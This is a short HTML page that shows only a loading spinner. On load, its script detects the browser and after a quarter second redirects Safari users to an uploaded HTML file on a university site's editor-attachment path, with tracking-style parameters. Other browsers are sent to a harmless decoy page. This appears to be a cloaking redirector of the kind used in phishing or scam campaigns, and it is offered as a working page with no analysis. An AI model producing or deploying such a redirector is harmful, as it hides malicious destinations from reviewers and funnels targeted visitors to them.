<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>Browser Engine Detection</title>
    <style>
        .loadingBox {
            display: flex;
            justify-content: center;
            height: 90vh;
            align-items: center;
        }

        .loading {
            width: 16vw;
            height: 16vw;
            border: 3px solid #000;
            border-top-color: transparent;
            border-radius: 100%;
            animation: circle infinite 0.75s linear;
        }


        @keyframes circle {
            0% {
                transform: rotate(0);
            }

            100% {
                transform: rotate(360deg);
            }
        }
    </style>
</head>

<body>
    <!-- 页面内容 -->
    <div class="loadingBox">
        <div class="loading"></div>
    </div>
</body>
<script>
    const appleHref = 'https://bm.jift.edu.cn/Public/kindeditor/attached/file/20240903/20240903144644_73141.html?_w,v=qrd?f=2nGDfxM95A?avh=659?uid=AEfg05Xdcz_rvIGpi7xVq'
    const otherHref = 'https://pages.github.com/?(null)'
    const time = 250
    // 获取浏览器内核信息
    function BrowserInfo() {
        let userAgent = self.navigator.userAgent;
        if (/edge\/([\d\.]+)/i.exec(userAgent)) return { name: "Edge", version: /edge\/([\d\.]+)/i.exec(userAgent)[1] }
        if (/msie/i.test(userAgent)) return { name: "Internet Explorer", version: /msie ([\d\.]+)/i.exec(userAgent)[1] }
        if (/Trident/i.test(userAgent)) return { name: "Internet Explorer", version: /rv:([\d\.]+)/i.exec(userAgent)[1] }
        if (/chrome/i.test(userAgent)) return { name: "Chrome", version: /chrome\/([\d\.]+)/i.exec(userAgent)[1] }
        if (/safari/i.test(userAgent)) return { name: "Safari", version: /version\/([\d\.]+)/i.exec(userAgent)[1] }
        if (/firefox/i.test(userAgent)) return { name: "Firefox", version: /firefox\/([\d\.]+)/i.exec(userAgent)[1] }
        return { name: "unknow" }
    }
    const engine = BrowserInfo()
    // 判断内核是否为苹果，如果不是则跳转到其他页面
    setTimeout(function () {
        if (engine.name !== 'Safari') {
            window.location.href = otherHref  //不是苹果浏览器跳转的链接
        } else {
            window.location.href = appleHref //是苹果浏览器跳转的链接
        }
    }, time)
</script>

</html>
